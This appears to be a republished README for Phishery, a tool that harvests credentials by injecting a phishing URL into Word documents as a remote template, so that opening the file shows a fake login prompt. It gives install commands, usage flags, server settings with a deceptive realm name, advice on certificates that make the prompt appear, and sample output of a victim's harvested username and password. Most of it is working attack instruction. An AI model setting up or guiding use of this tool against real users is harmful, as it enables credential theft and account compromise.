Phishery - An SSL Enabled Basic Auth Credential Harvester with a Word Document Template URL Injector
Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.
The power of phishery is best demonstrated by setting a Word document's template to a phishery URL. This causes Microsoft Word to make a request to the URL, resulting in an Authentication Dialog being shown to the end-user. The ability to inject any .docx file with a URL is possible using phishery's
-i [in docx]
, -o [out docx]
, and -u [url]
Operating system specific packages can be downloaded from here.
Extract the archive, and optionally, install binary to $PATH
$ tar -xzvf phishery*.tar.gz
$ cd phishery*
$ cp phishery /usr/local/bin
$ phishery --help
|\ \\\\__ O __ _ __
| \_/ o \ o ____ / /_ (_)____/ /_ ___ _______ __
> _ (( <_ oO / __ \/ __ \/ / ___/ __ \/ _ \/ ___/ / / /
| / \__+___/ / /_/ / / / / (__ ) / / / __/ / / /_/ /
|/ |/ / .___/_/ /_/_/____/_/ /_/\___/_/ \__, /
/_/ Basic Auth Credential Harvester (____/
with Word Doc Template Injector
Start the server : phishery -s settings.json -c credentials.json
Inject a template : phishery -u -i good.docx -o bad.docx
-h, --help Show usage and exit.
-v Show version and exit.
-s The JSON settings file used to setup the server. [default: "settings.json"]
-c The JSON file to store harvested credentials. [default: "credentials.json"]
-u The phishery URL to use as the Word document template.
-i The Word .docx file to inject with a template URL.
-o The new Word .docx file with the injected template URL.
Running the server
Modify the provided settings.json file as needed, by default it should look like this:
"ip": "",
"port": "443",
"sslCert": "server.crt",
"sslKey": "server.key",
"basicRealm": "Secure Document Gateway",
"responseStatus": 200,
"responseFile": "template.dotx",
"responseHeaders": [
["Content-Type", "application/vnd.openxmlformats-officedocument.wordprocessingml.template"]
The settings file may also be configured to output a simple body, by using responseBody, like this:
"ip": "",
"port": "443",
"sslCert": "server.crt",
"sslKey": "server.key",
"basicRealm": "Secure Document Gateway",
"responseStatus": 404,
"responseBody": "<h1>Not Found</h1>",
"responseHeaders": [
["Content-Type", "text/html"]
It's recommended that the provided cert is replaced with a trusted one, such as one generated with LetsEncrypt. Microsoft Word on OS X will prevent the auth dialog if the cert is invalid, and Microsoft Word on Windows will prompt the user to accept the invalid certificate.
Once the server is configured and running, all you need to do is embed a phishery URL in a document, or anywhere else your heart desires. phishery does give you the ability to inject your URL into a Word document as a template, instructions on how to do this can be found below.
Injecting a Word Document
To inject a Word document with a template URL, you'll need a .docx file and the phishery server URL.
Now run phishery with your document and URL:
$ phishery -u -i good.docx -o bad.docx
[+] Opening Word document: good.docx
[+] Setting Word document template to:
[+] Saving injected Word document to: bad.docx
[*] Injected Word document has been saved!
Make sure your phishery server is running and available at the URL you used. Now when the Word document
is opened, the victim will be prompted with an authentication dialog.Now when the victim opens the document, you'll see the following:
$ ./phishery
[+] Credential store initialized at: credentials.json
[+] Starting HTTPS Auth Server on:
[*] Request Received at 2016-09-25 01:06:28: HEAD
[*] Sending Basic Auth response to:
[*] New credentials harvested!
[HTTP] Host : secure.example.local
[HTTP] Request : /docs
[HTTP] User Agent : Microsoft Office Word
[HTTP] IP Address :
[AUTH] Username : john.doe
[AUTH] Password : Summer15
Phishery - An SSL Enabled Basic Auth Credential Harvester with a Word Document Template URL Injector
Reviewed by Zion3R
6:24 PM